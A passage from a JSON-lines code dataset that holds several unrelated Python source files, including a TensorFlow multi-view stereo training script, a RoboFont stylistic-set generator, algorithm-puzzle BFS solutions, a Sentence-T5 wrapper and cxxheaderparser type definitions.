FLAGS.interval_scale)\n images.append(image)\n cams.append(cam)\n\n depimg = imread(os.path.join(data[2 * self.view_num]))\n depth_image = (np.float32(depimg) / 64.0) # WHU MVS dataset\n\n scaled_cams = scale_mvs_camera(cams, scale=FLAGS.sample_scale)\n\n # mask out-of-range depth pixels (in a relaxed range)\n depth_start = cams[0][1, 3, 0] + cams[0][1, 3, 1]\n depth_end = cams[0][1, 3, 0] + (FLAGS.max_d - 2) * cams[0][1, 3, 1]#\n depth_image = mask_depth_image(depth_image, depth_start, depth_end)\n\n # return mvs input\n self.counter += 1\n duration = time.time() - start_time\n images = np.stack(images, axis=0)\n scaled_cams = np.stack(scaled_cams, axis=0)\n\n yield (images, scaled_cams, cams, depth_image)\n\ndef average_gradients(tower_grads):\n \"\"\"Calculate the average gradient for each shared variable across all towers.\n Note that this function provides a synchronization point across all towers.\n Args:\n tower_grads: List of lists of (gradient, variable) tuples. The outer list\n is over individual gradients. The inner list is over the gradient\n calculation for each tower.\n Returns:\n List of pairs of (gradient, variable) where the gradient has been averaged\n across all towers.\n \"\"\"\n average_grads = []\n for grad_and_vars in zip(*tower_grads):\n # Note that each grad_and_vars looks like the following:\n # ((grad0_gpu0, var0_gpu0), ... , (grad0_gpuN, var0_gpuN))\n grads = []\n for g, _ in grad_and_vars:\n # Add 0 dimension to the gradients to represent the tower.\n expanded_g = tf.expand_dims(g, 0)\n\n # Append on a 'tower' dimension which we will average over below.\n grads.append(expanded_g)\n\n # Average over the 'tower' dimension.\n grad = tf.concat(axis=0, values=grads)\n grad = tf.reduce_mean(grad, 0)\n\n # Keep in mind that the Variables are redundant because they are shared\n # across towers. So .. 
we will just return the first tower's pointer to\n # the Variable.\n v = grad_and_vars[0][1]\n grad_and_var = (grad, v)\n average_grads.append(grad_and_var)\n return average_grads\n\ndef train(traning_list):\n \"\"\" training rednet \"\"\"\n training_sample_size = len(traning_list)\n print ('sample number: ', training_sample_size)\n\n with tf.Graph().as_default(), tf.device('/cpu:0'): \n\n ########## data iterator #########\n # training generators\n training_generator = iter(MVSGenerator(traning_list, FLAGS.view_num))\n generator_data_type = (tf.float32, tf.float32, tf.float32, tf.float32)\n # dataset from generator\n training_set = tf.data.Dataset.from_generator(lambda: training_generator, generator_data_type)\n training_set = training_set.batch(FLAGS.batch_size)\n training_set = training_set.prefetch(buffer_size=1)\n # iterators\n training_iterator = training_set.make_initializable_iterator()\n\n ########## optimization options ##########\n global_step = tf.Variable(0, trainable=False, name='global_step')\n lr_op = tf.train.exponential_decay(FLAGS.base_lr, global_step=global_step, \n decay_steps=FLAGS.stepvalue, decay_rate=FLAGS.gamma, name='lr')\n opt = tf.train.RMSPropOptimizer(learning_rate=lr_op)\n\n tower_grads = []\n for i in range(FLAGS.num_gpus):\n with tf.device('/gpu:%d' % i):\n with tf.name_scope('Model_tower%d' % i) as scope:\n # generate data\n images, scale_cams, cams, depth_image = training_iterator.get_next()\n images.set_shape(tf.TensorShape([None, FLAGS.view_num, None, None, 3]))\n scale_cams.set_shape(tf.TensorShape([None, FLAGS.view_num, 2, 4, 4]))\n cams.set_shape(tf.TensorShape([None, FLAGS.view_num, 2, 4, 4]))\n depth_image.set_shape(tf.TensorShape([None, None, None, 1]))\n depth_start = tf.reshape(\n tf.slice(scale_cams, [0, 0, 1, 3, 0], [FLAGS.batch_size, 1, 1, 1, 1]), [FLAGS.batch_size])\n depth_interval = tf.reshape(\n tf.slice(scale_cams, [0, 0, 1, 3, 1], [FLAGS.batch_size, 1, 1, 1, 1]), [FLAGS.batch_size])\n\n is_master_gpu = False\n if i == 0:\n is_master_gpu = True\n\n ## inference\n # probability volume\n prob_volume = inference_prob_recurrent(\n images, scale_cams, FLAGS.max_d, depth_start, depth_interval, is_master_gpu)\n\n # classification loss\n loss, mae, less_one_accuracy, less_three_accuracy, depth_map = \\\n tr_classification_loss(\n prob_volume, depth_image, FLAGS.max_d, depth_start, depth_interval)\n\n # retain the summaries from the final tower.\n summaries = tf.get_collection(tf.GraphKeys.SUMMARIES, scope)\n\n # calculate the gradients for the batch of data on this CIFAR tower.\n grads = opt.compute_gradients(loss)\n\n # keep track of the gradients across all towers.\n tower_grads.append(grads)\n \n # average gradient\n grads = average_gradients(tower_grads)\n \n # training opt\n train_opt = opt.apply_gradients(grads, global_step=global_step)\n\n # summary \n summaries.append(tf.summary.scalar('loss', loss))\n summaries.append(tf.summary.scalar('less_one_meter_accuracy', less_one_accuracy))\n summaries.append(tf.summary.scalar('less_three_interval_accuracy', less_three_accuracy))\n summaries.append(tf.summary.scalar('lr', lr_op))\n weights_list = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)\n for var in weights_list:\n summaries.append(tf.summary.histogram(var.op.name, var))\n for grad, var in grads:\n if grad is not None:\n summaries.append(tf.summary.histogram(var.op.name + '/gradients', grad))\n \n # saver\n saver = tf.train.Saver(tf.global_variables(), max_to_keep=None) \n summary_op = tf.summary.merge(summaries)\n\n # initialization 
option\n init_op = tf.global_variables_initializer()\n config = tf.ConfigProto(allow_soft_placement = True)\n config.gpu_options.allow_growth = True\n\n with tf.Session(config=config) as sess: \n \n # initialization\n total_step = 0\n sess.run(init_op)\n summary_writer = tf.summary.FileWriter(FLAGS.log_dir, sess.graph)\n\n # load pre-trained model\n if FLAGS.use_pretrain:\n pretrained_model_path = os.path.join(FLAGS.model_dir, 'model.ckpt')\n restorer = tf.train.Saver(tf.global_variables())\n restorer.restore(sess, '-'.join([pretrained_model_path, str(FLAGS.ckpt_step)]))\n print('Pre-trained model restored from %s' %\n ('-'.join([pretrained_model_path, str(FLAGS.ckpt_step)])))\n total_step = FLAGS.ckpt_step\n\n # training several epochs\n for epoch in range(FLAGS.epoch):\n\n # training of one epoch\n step = 0\n sess.run(training_iterator.initializer)\n for _ in range(int(training_sample_size / FLAGS.num_gpus)):\n\n # run one batch\n start_time = time.time()\n try:\n out_summary_op, out_opt, out_loss, out_less_one, out_less_three = sess.run(\n [summary_op, train_opt, loss, less_one_accuracy, less_three_accuracy])\n except tf.errors.OutOfRangeError:\n print(\"End of dataset\") # ==> \"End of dataset\"\n break\n duration = time.time() - start_time\n\n # print info\n if step % FLAGS.display == 0:\n print('epoch, %d, step %d, total_step %d, loss = %.4f, (< 1m) = %.4f, (< 3px) = %.4f (%.3f sec/step)' %\n (epoch, step, total_step, out_loss, out_less_one, out_less_three, duration))\n \n # write summary\n if step % (FLAGS.display * 10) == 0:\n summary_writer.add_summary(out_summary_op, total_step)\n \n # save the model checkpoint periodically\n if (total_step % FLAGS.snapshot == 0 or step == (training_sample_size - 1)):\n model_folder = os.path.join(FLAGS.model_dir)\n if not os.path.exists(model_folder):\n os.mkdir(model_folder)\n ckpt_path = os.path.join(model_folder, 'model.ckpt')\n print('Saving model to %s' % ckpt_path)\n saver.save(sess, ckpt_path, global_step=total_step)\n step += FLAGS.batch_size * FLAGS.num_gpus\n total_step += FLAGS.batch_size * FLAGS.num_gpus\n\ndef main(argv=None):\n \"\"\" program entrance \"\"\"\n\n # Prepare all training samples\n sample_list = gen_train_mvs_list(FLAGS.data_root)\n\n # Shuffle\n random.shuffle(sample_list)\n\n # Training entrance.\n train(sample_list)\n\n\nif __name__ == '__main__':\n\n print ('Training RED-Net with %d views' % FLAGS.view_num)\n\n tf.app.run()","repo_name":"gpcv-liujin/REDNet","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":13546,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"85"} +{"seq_id":"5658893269","text":"import argparse\nimport logging\n\n\ndef arg_required(arg):\n if arg is None : \n logging.warning(\"can't find \" + arg)\n exit\n\ndef get_arguments(): \n parser = argparse.ArgumentParser(\"jinja_swagger\")\n parser.add_argument(\"-a\",\"--api_name\", help=\"Enter API Name (i.e: Navy USM Current Occupation)\")\n parser.add_argument(\"-c\",\"--csv\", help=\"api.csv is the default to overwrite us\")\n parser.add_argument(\"-mo\",\"--main_object\", help=\"The main object name not returned in the JSON \")\n parser.add_argument(\"-t\",\"--type\", help=\"type array or object\")\n parser.add_argument(\"-s\",\"--select_by\", help=\"Select by ID \")\n parser.add_argument(\"-ns\",\"--nested_object\", help=\"Object Name in the JSON\")\n parser.add_argument(\"-d\",\"--debug\", help= \"show debug information\")\n args = parser.parse_args()\n\n\n if args.debug 
is not None:\n logging.Logger.setLevel(logging.DEBUG)\n\n arg_required(args.csv) \n arg_required(args.api_name)\n arg_required(args.select_by) \n arg_required(args.nested_object)\n\n return args","repo_name":"hanymorcos/jinja_csv","sub_path":"helpers/arg_procesor.py","file_name":"arg_procesor.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"14805321150","text":"# Search for glyphs with \"ss\" in their suffix, create stylistic\n# sets feature code for them, and copy it to clipboard.\n\nimport mojo\nfrom AppKit import NSPasteboard, NSArray\n\nf = CurrentFont()\n\nsets = []\nfeatures = \"\"\n\nfor g in f.keys():\n if \".\" in g:\n if \"ss\" in g.split(\".\")[1] and g.split(\".\")[1] not in sets:\n sets.append(g.split(\".\")[1])\n\nsets.sort()\n\nfor set in sets:\n features += \"feature %s {\\n\" % set\n for g in f:\n if set in g.name:\n base = g.name.split(\".\")[0]\n suffix = g.name.split(\".\")[1]\n features += \"sub %s by %s;\\n\" % (base, g.name)\n features += \"} %s;\\n\\n\" % set\n\nif features != \"\":\n p = NSPasteboard.generalPasteboard()\n p.clearContents()\n a = NSArray.arrayWithObject_(features)\n p.writeObjects_(a)\n mojo.UI.Message('Stylistic sets features copied to your clipboard')\n\nif features == \"\":\n mojo.UI.Message(\"Could not find properly named glyphs.\")","repo_name":"ryanbugden/Misc-Robofont-Scripts","sub_path":"write_stylistic_sets.py","file_name":"write_stylistic_sets.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"40459439413","text":"from twe import *\n\nopts = Options()\nopts.save_path = \"../output/model/sou\"\nopts.train_data = \"../data/sou/train.dat\"\nopts.test_data = \"../data/sou/test.dat\"\n\nopts.start_time = -5679590961\nopts._start_time = -5679590961\nopts.end_time = 1138662000\nopts._end_time = 1138662000\nopts.time_transform = 681825296\n\nopts.nclst = 200\nopts.clst_window = 30\n\nopts.nepochs = 200\n\nopts.batch_size = 100\nopts.epoch_size = 100000\n\nopts.window_size = 20\nopts.max_pairs_from_sample = 100\nopts.max_same_target = 10\n\nmain(opts)\n","repo_name":"w-is-h/stwe","sub_path":"tests/test_sou.py","file_name":"test_sou.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"19364516069","text":"from response.generic_response import GenericResponse\n\n\nclass ErrorResponse(GenericResponse):\n ERROR_TYPE = 'error'\n\n def __init__(self, req_id: int, code: int, error: str):\n GenericResponse.__init__(self, req_id=req_id, properties={})\n self.response_type = self.ERROR_TYPE\n self.error_code = code\n self.error_message = error\n","repo_name":"migdea11/ibapi_handler","sub_path":"response/error_response.py","file_name":"error_response.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"19581036687","text":"# 8:50 ~ 9:50\nfrom collections import deque \n\nn, m = map(int, input().split())\n\narr_map = []\nfor _ in range(n):\n arr_map.append(list(map(int,input())))\n\ndef dfs(arr_map):\n x, y = 0, 0\n \n dx = [-1,0,1,0]\n dy = [0,-1,0,1]\n queue = deque()\n queue.append((x,y))\n\n while queue:\n x, y = queue.popleft()\n \n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n\n if 0 <= nx < n and 0 <= ny < m:\n if nx == n - 1 and ny == m 
- 1:\n return arr_map[x][y] + 1\n\n if arr_map[nx][ny] == 1:\n arr_map[nx][ny] = arr_map[x][y] + 1\n queue.append((nx,ny))\n return False\n\nres = dfs(arr_map)\nprint(res)\n\n \n\n\n","repo_name":"daunjeong824/Practice_Algorithm","sub_path":"BFS_DFS/2178.py","file_name":"2178.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"40861954871","text":"import math\nimport sys\n\nN = int(sys.stdin.readline().rstrip())\nnumbers = list(map(int, sys.stdin.readline().rstrip().split()))\n\nprime_numbers = []\n\nfor i in range(2, 1001):\n prime = True\n for j in range(2, int(math.sqrt(i) + 1)):\n if i % j == 0:\n prime = False\n\n if prime:\n prime_numbers.append(i)\n\ncount = 0\n\nfor num in numbers:\n if num in prime_numbers:\n count += 1\n\nprint(count)\n","repo_name":"KakaoFarm/unan-python-algorithm-study","sub_path":"BOJClass2/1978.py","file_name":"1978.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"8567068409","text":"#!/usr/bin/python3\n'''\nqueries the Reddit API and\nreturns the number of subscribers\n'''\nimport requests\n\n\ndef top_ten(subreddit):\n headers = {\n 'User-Agent': 'My User Agent 1.0'\n }\n URL = \"https://www.reddit.com/r/{}/top.json?limit=10\".format(subreddit)\n try:\n reddit_data = requests.get(url=URL, headers=headers)\n all_data = reddit_data.json().get('data').get('children')\n print('a')\n titles = []\n print('b')\n for i in all_data:\n if i.get('data').get('title'):\n titles.append(i.get('data').get('title'))\n\n print(i)\n print('c')\n for t in titles:\n print(t)\n except:\n print('None')\n","repo_name":"SoniaChevli/holberton-system_engineering-devops","sub_path":"0x16-api_advanced/1-top_ten.py","file_name":"1-top_ten.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"21464485999","text":"from typing import List\n\nfrom transformers import T5Tokenizer, T5Model\nimport torch\nimport numpy as np\n\n\nclass SentenceT5:\n \"\"\"Class to use the [sentence-t5-base-ja-mean-token](https://huggingface.co/sonoisa/sentence-t5-base-ja-mean-tokens)\n \"\"\"\n def __init__(self, model_name_or_path: str, device=None):\n self.tokenizer = T5Tokenizer.from_pretrained(model_name_or_path, is_fast=False)\n self.model = T5Model.from_pretrained(model_name_or_path).encoder\n self.model.eval()\n\n if device is None:\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n self.device = torch.device(device)\n self.model.to(device)\n\n def _mean_pooling(self, model_output, attention_mask):\n token_embeddings = model_output[0] #First element of model_output contains all token embeddings\n input_mask_expanded = attention_mask.unsqueeze(-1).expand(token_embeddings.size()).float()\n return torch.sum(token_embeddings * input_mask_expanded, 1) / torch.clamp(input_mask_expanded.sum(1), min=1e-9)\n\n @torch.no_grad()\n def encode(self, docs: List[str], batch_size=8):\n all_embeddings = []\n iterator = range(0, len(docs), batch_size)\n for batch_idx in iterator:\n batch = docs[batch_idx:batch_idx + batch_size]\n\n encoded_input = self.tokenizer.batch_encode_plus(\n batch,\n max_length=4096,\n padding=\"longest\",\n truncation=True,\n return_tensors=\"pt\").to(self.device)\n model_output = self.model(**encoded_input)\n sentence_embeddings = self._mean_pooling(model_output, 
encoded_input[\"attention_mask\"]).to('cpu')\n\n all_embeddings.extend(sentence_embeddings)\n\n return torch.stack(all_embeddings)\n","repo_name":"nptdat/llm_retrieval_jawiki","sub_path":"llm_retrieval/src/qa/vectorizer/internal_model/sentence_t5.py","file_name":"sentence_t5.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"42897908346","text":"import typing\nfrom dataclasses import dataclass, field\n\n\n@dataclass\nclass Token:\n \"\"\"\n In an ideal world, this Token class would not be exposed via the user\n visible API. Unfortunately, getting to that point would take a significant\n amount of effort.\n\n It is not expected that these will change, but they might.\n\n At the moment, the only supported use of Token objects are in conjunction\n with the ``tokfmt`` function. As this library matures, we'll try to clarify\n the expectations around these. File an issue on github if you have ideas!\n \"\"\"\n\n #: Raw value of the token\n value: str\n\n #: Lex type of the token\n type: str = field(repr=False, compare=False, default=\"\")\n\n\n@dataclass\nclass Value:\n \"\"\"\n A unparsed list of tokens\n\n .. code-block:: c++\n\n int x = 0x1337;\n ~~~~~~\n \"\"\"\n\n #: Tokens corresponding to the value\n tokens: typing.List[Token]\n\n\n@dataclass\nclass NamespaceDecl:\n \"\"\"\n Namespace declarations\n\n .. code-block:: c++\n\n namespace foo::bar {}\n ~~~~~~~~\n \"\"\"\n\n #: These are the names (split by ::) for this namespace declaration,\n #: but does not include any parent namespace names\n #:\n #: An anonymous namespace is an empty list\n names: typing.List[str]\n inline: bool = False\n\n\n@dataclass\nclass DecltypeSpecifier:\n \"\"\"\n Contents of a decltype (inside the parentheses)\n\n .. code-block:: c++\n\n decltype(Foo::Bar)\n ~~~~~~~~\n \"\"\"\n\n #: Unparsed tokens within the decltype\n tokens: typing.List[Token]\n\n\n@dataclass\nclass FundamentalSpecifier:\n \"\"\"\n A specifier that only contains fundamental types\n \"\"\"\n\n name: str\n\n\n@dataclass\nclass NameSpecifier:\n \"\"\"\n An individual segment of a type name\n\n .. code-block:: c++\n\n Foo::Bar\n ~~~\n\n \"\"\"\n\n name: str\n\n specialization: typing.Optional[\"TemplateSpecialization\"] = None\n\n\n@dataclass\nclass AutoSpecifier:\n \"\"\"\n Used for an auto return type\n \"\"\"\n\n name: str = \"auto\"\n\n\n@dataclass\nclass AnonymousName:\n \"\"\"\n A name for an anonymous class, such as in a typedef. There is no string\n associated with this name, only an integer id. Things that share the same\n anonymous name have anonymous name instances with the same id\n \"\"\"\n\n #: Unique id associated with this name (only unique per parser instance!)\n id: int\n\n\nPQNameSegment = typing.Union[\n AnonymousName, FundamentalSpecifier, NameSpecifier, DecltypeSpecifier, AutoSpecifier\n]\n\n\n@dataclass\nclass PQName:\n \"\"\"\n Possibly qualified name of a C++ type.\n \"\"\"\n\n #: All of the segments of the name. This is always guaranteed to have at\n #: least one element in it. 
Name is segmented by '::'\n #:\n #: If a name refers to the global namespace, the first segment will be an\n #: empty NameSpecifier\n segments: typing.List[PQNameSegment]\n\n #: Set if the name starts with class/enum/struct\n classkey: typing.Optional[str] = None\n\n #: Set to true if the type was preceded with 'typename'\n has_typename: bool = False\n\n\n@dataclass\nclass Enumerator:\n \"\"\"\n An individual value of an enumeration\n \"\"\"\n\n #: The enumerator key name\n name: str\n\n #: None if not explicitly specified\n value: typing.Optional[Value] = None\n\n #: Documentation if present\n doxygen: typing.Optional[str] = None\n\n\n@dataclass\nclass EnumDecl:\n \"\"\"\n An enumeration type\n \"\"\"\n\n typename: PQName\n\n values: typing.List[Enumerator]\n\n base: typing.Optional[PQName] = None\n\n #: Documentation if present\n doxygen: typing.Optional[str] = None\n\n #: If within a class, the access level for this decl\n access: typing.Optional[str] = None\n\n\n@dataclass\nclass TemplateArgument:\n \"\"\"\n A single argument for a template specialization\n\n .. code-block:: c++\n\n Foo\n ~~~\n\n \"\"\"\n\n #: If this argument is a type, it is stored here as a DecoratedType,\n #: otherwise it's stored as an unparsed set of values\n arg: typing.Union[\"DecoratedType\", \"FunctionType\", Value]\n\n param_pack: bool = False\n\n\n@dataclass\nclass TemplateSpecialization:\n \"\"\"\n Contains the arguments of a template specialization\n\n .. code-block:: c++\n\n Foo\n ~~~~~~~~~~~\n\n \"\"\"\n\n args: typing.List[TemplateArgument]\n\n\n@dataclass\nclass FunctionType:\n \"\"\"\n A function type, currently only used in a function pointer\n\n .. note:: There can only be one of FunctionType or Type in a DecoratedType\n chain\n \"\"\"\n\n return_type: \"DecoratedType\"\n parameters: typing.List[\"Parameter\"]\n\n #: If a member function pointer\n # TODO classname: typing.Optional[PQName]\n\n #: Set to True if ends with ``...``\n vararg: bool = False\n\n #: True if function has a trailing return type (``auto foo() -> int``).\n #: In this case, the 'auto' return type is removed and replaced with\n #: whatever the trailing return type was\n has_trailing_return: bool = False\n\n noexcept: typing.Optional[Value] = None\n\n #: Only set if an MSVC calling convention (__stdcall, etc) is explictly\n #: specified.\n #:\n #: .. note:: If your code contains things like WINAPI, you will need to\n #: use a preprocessor to transform it to the appropriate\n #: calling convention\n msvc_convention: typing.Optional[str] = None\n\n\n@dataclass\nclass Type:\n \"\"\"\n A type with a name associated with it\n \"\"\"\n\n typename: PQName\n\n const: bool = False\n volatile: bool = False\n\n\n@dataclass\nclass Array:\n \"\"\"\n Information about an array. Multidimensional arrays are represented as\n an array of array.\n \"\"\"\n\n #: The type that this is an array of\n array_of: typing.Union[\"Array\", \"Pointer\", Type]\n\n #: Size of the array\n #:\n #: .. 
code-block:: c++\n #:\n #: int x[10];\n #: ~~\n size: typing.Optional[Value]\n\n\n@dataclass\nclass Pointer:\n \"\"\"\n A pointer\n \"\"\"\n\n #: Thing that this points to\n ptr_to: typing.Union[Array, FunctionType, \"Pointer\", Type]\n\n const: bool = False\n volatile: bool = False\n\n\n@dataclass\nclass Reference:\n \"\"\"\n A lvalue (``&``) reference\n \"\"\"\n\n ref_to: typing.Union[Array, FunctionType, Pointer, Type]\n\n\n@dataclass\nclass MoveReference:\n \"\"\"\n An rvalue (``&&``) reference\n \"\"\"\n\n moveref_to: typing.Union[Array, FunctionType, Pointer, Type]\n\n\n#: A type or function type that is decorated with various things\n#:\n#: .. note:: There can only be one of FunctionType or Type in a DecoratedType\n#: chain\nDecoratedType = typing.Union[Array, Pointer, MoveReference, Reference, Type]\n\n\n@dataclass\nclass TemplateNonTypeParam:\n \"\"\"\n\n .. code-block:: c++\n\n template \n ~~~~~\n\n template \n ~~~~~~~~~~~~~~~~~~~\n\n template \n ~~~~~~\n \"\"\"\n\n type: DecoratedType\n name: typing.Optional[str] = None\n default: typing.Optional[Value] = None\n\n #: Contains a ``...``\n param_pack: bool = False\n\n\n@dataclass\nclass TemplateTypeParam:\n \"\"\"\n\n .. code-block:: c++\n\n template \n ~~~~~~~~~~\n \"\"\"\n\n #: 'typename' or 'class'\n typekey: str\n\n name: typing.Optional[str] = None\n\n param_pack: bool = False\n\n default: typing.Optional[Value] = None\n\n #: A template-template param\n template: typing.Optional[\"TemplateDecl\"] = None\n\n\n#: A parameter for a template declaration\n#:\n#: .. code-block:: c++\n#:\n#: template \n#: ~~~~~~~~~~\nTemplateParam = typing.Union[TemplateNonTypeParam, TemplateTypeParam]\n\n\n@dataclass\nclass TemplateDecl:\n \"\"\"\n Template declaration for a function or class\n\n .. code-block:: c++\n\n template \n class Foo {};\n\n template \n T fn();\n\n \"\"\"\n\n params: typing.List[TemplateParam] = field(default_factory=list)\n\n\n@dataclass\nclass ForwardDecl:\n \"\"\"\n Represents a forward declaration of a user defined type\n \"\"\"\n\n typename: PQName\n template: typing.Optional[TemplateDecl] = None\n doxygen: typing.Optional[str] = None\n\n #: Set if this is a forward declaration of an enum and it has a base\n enum_base: typing.Optional[PQName] = None\n\n #: If within a class, the access level for this decl\n access: typing.Optional[str] = None\n\n\n@dataclass\nclass BaseClass:\n \"\"\"\n Base class declarations for a class\n \"\"\"\n\n #: access specifier for this base\n access: str\n\n #: possibly qualified type name for the base\n typename: PQName\n\n #: Virtual inheritance\n virtual: bool = False\n\n #: Contains a ``...``\n param_pack: bool = False\n\n\n@dataclass\nclass ClassDecl:\n \"\"\"\n A class is a user defined type (class/struct/union)\n \"\"\"\n\n typename: PQName\n\n bases: typing.List[BaseClass] = field(default_factory=list)\n template: typing.Optional[TemplateDecl] = None\n\n explicit: bool = False\n final: bool = False\n\n doxygen: typing.Optional[str] = None\n\n #: If within a class, the access level for this decl\n access: typing.Optional[str] = None\n\n @property\n def classkey(self) -> typing.Optional[str]:\n return self.typename.classkey\n\n\n@dataclass\nclass Parameter:\n \"\"\"\n A parameter of a function/method\n \"\"\"\n\n type: DecoratedType\n name: typing.Optional[str] = None\n default: typing.Optional[Value] = None\n param_pack: bool = False\n\n\n@dataclass\nclass Function:\n \"\"\"\n A function declaration, potentially with the function body\n \"\"\"\n\n #: Only constructors and destructors 
don't have a return type\n return_type: typing.Optional[DecoratedType]\n\n name: PQName\n parameters: typing.List[Parameter]\n\n #: Set to True if ends with ``...``\n vararg: bool = False\n\n doxygen: typing.Optional[str] = None\n\n constexpr: bool = False\n extern: typing.Union[bool, str] = False\n static: bool = False\n inline: bool = False\n\n #: If true, the body of the function is present\n has_body: bool = False\n\n #: True if function has a trailing return type (``auto foo() -> int``).\n #: In this case, the 'auto' return type is removed and replaced with\n #: whatever the trailing return type was\n has_trailing_return: bool = False\n\n template: typing.Optional[TemplateDecl] = None\n\n throw: typing.Optional[Value] = None\n noexcept: typing.Optional[Value] = None\n\n #: Only set if an MSVC calling convention (__stdcall, etc) is explictly\n #: specified.\n #:\n #: .. note:: If your code contains things like WINAPI, you will need to\n #: use a preprocessor to transform it to the appropriate\n #: calling convention\n msvc_convention: typing.Optional[str] = None\n\n\n@dataclass\nclass Method(Function):\n \"\"\"\n A method declaration, potentially with the method body\n \"\"\"\n\n access: str = \"\"\n\n const: bool = False\n volatile: bool = False\n\n #: ref-qualifier for this method, either lvalue (&) or rvalue (&&)\n #:\n #: .. code-block:: c++\n #:\n #: void foo() &&;\n #: ~~\n #:\n ref_qualifier: typing.Optional[str] = None\n\n constructor: bool = False\n explicit: bool = False\n default: bool = False\n deleted: bool = False\n\n destructor: bool = False\n\n pure_virtual: bool = False\n virtual: bool = False\n final: bool = False\n override: bool = False\n\n\n@dataclass\nclass Operator(Method):\n \"\"\"\n Represents an operator method\n \"\"\"\n\n #: The operator type (+, +=, etc).\n #:\n #: In the case of a conversion operator (such as 'operator bool'), this\n #: is the string \"conversion\" and the full Type is found in return_type\n operator: str = \"\"\n\n\n@dataclass\nclass FriendDecl:\n \"\"\"\n Represents a friend declaration -- friends can only be classes or functions\n \"\"\"\n\n cls: typing.Optional[ForwardDecl] = None\n\n fn: typing.Optional[Function] = None\n\n\n@dataclass\nclass Typedef:\n \"\"\"\n A typedef specifier. A unique typedef specifier is created for each alias\n created by the typedef.\n\n .. code-block:: c++\n\n typedef type name, *pname;\n\n \"\"\"\n\n #: The aliased type or function type\n #:\n #: .. code-block:: c++\n #:\n #: typedef type *pname;\n #: ~~~~~~\n type: typing.Union[DecoratedType, FunctionType]\n\n #: The alias introduced for the specified type\n #:\n #: .. 
code-block:: c++\n #:\n #: typedef type *pname;\n #: ~~~~~\n name: str\n\n #: If within a class, the access level for this decl\n access: typing.Optional[str] = None\n\n\n@dataclass\nclass Variable:\n \"\"\"\n A variable declaration\n \"\"\"\n\n name: PQName\n type: DecoratedType\n\n value: typing.Optional[Value] = None\n\n constexpr: bool = False\n extern: typing.Union[bool, str] = False\n static: bool = False\n inline: bool = False\n\n #: Can occur for a static variable for a templated class\n template: typing.Optional[TemplateDecl] = None\n\n doxygen: typing.Optional[str] = None\n\n\n@dataclass\nclass Field:\n \"\"\"\n A field of a class\n \"\"\"\n\n #: public/private/protected\n access: str\n\n type: DecoratedType\n name: typing.Optional[str] = None\n\n value: typing.Optional[Value] = None\n bits: typing.Optional[int] = None\n\n constexpr: bool = False\n mutable: bool = False\n static: bool = False\n\n doxygen: typing.Optional[str] = None\n\n\n@dataclass\nclass UsingDecl:\n \"\"\"\n .. code-block:: c++\n\n using NS::ClassName;\n \"\"\"\n\n typename: PQName\n\n #: If within a class, the access level for this decl\n access: typing.Optional[str] = None\n\n\n@dataclass\nclass UsingAlias:\n \"\"\"\n .. code-block:: c++\n\n using foo = int;\n\n template \n using VectorT = std::vector;\n\n \"\"\"\n\n alias: str\n type: DecoratedType\n\n template: typing.Optional[TemplateDecl] = None\n\n #: If within a class, the access level for this decl\n access: typing.Optional[str] = None\n","repo_name":"Iltri12/Korai","sub_path":"lib/cxxheaderparser/cxxheaderparser/types.py","file_name":"types.py","file_ext":"py","file_size_in_byte":14037,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"85"} +{"seq_id":"20462606256","text":"import os\nfrom gears.compilers import ExecCompiler\n\n\nSOURCE = '\\n'.join((\n \"(function() {\",\n \" var template = Handlebars.template,\",\n \" templates = Handlebars.templates = Handlebars.templates || {};\",\n \" templates['%(name)s'] = template(%(source)s);\",\n \"}).call(this);\"))\n\n\nclass HandlebarsCompiler(ExecCompiler):\n\n result_mimetype = 'application/javascript'\n executable = 'node'\n params = [os.path.join(os.path.dirname(__file__), 'compiler.js')]\n\n def __call__(self, asset):\n super(HandlebarsCompiler, self).__call__(asset)\n asset.processed_source = SOURCE % {\n 'name': asset.attributes.path_without_suffix,\n 'source': asset.processed_source,\n }\n","repo_name":"gears/gears-handlebars","sub_path":"gears_handlebars/compiler.py","file_name":"compiler.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"21789290142","text":"import sys\nfrom collections import deque\ninput = sys.stdin.readline\nT = int(input())\n\ndef bfs(a,b):\n q = deque([(a,'')])\n while q:\n num,result = q.popleft()\n\n if num == b:\n print(result)\n return\n\n D = (2*num)%10000\n if not dp[D]:\n q.append((D,result+'D'))\n dp[D] = True\n S = (num-1)%10000\n if not dp[S]:\n q.append((S,result+'S'))\n dp[S] = True\n L = (10 * num + (num // 1000)) % 10000\n if not dp[L]:\n q.append((L, result + \"L\"))\n dp[L] = True\n\n \n R = (num // 10 + (num % 10) * 1000) % 10000\n if not dp[R]:\n q.append((R, result + \"R\"))\n dp[R] = True\n\nfor _ in range(T):\n a,b = map(int,input().split())\n dp = [False] * 10000\n bfs(a,b)\n\n\n","repo_name":"supersfel/baekjoon","sub_path":"21~30단계/동적계획법과 최단거리 
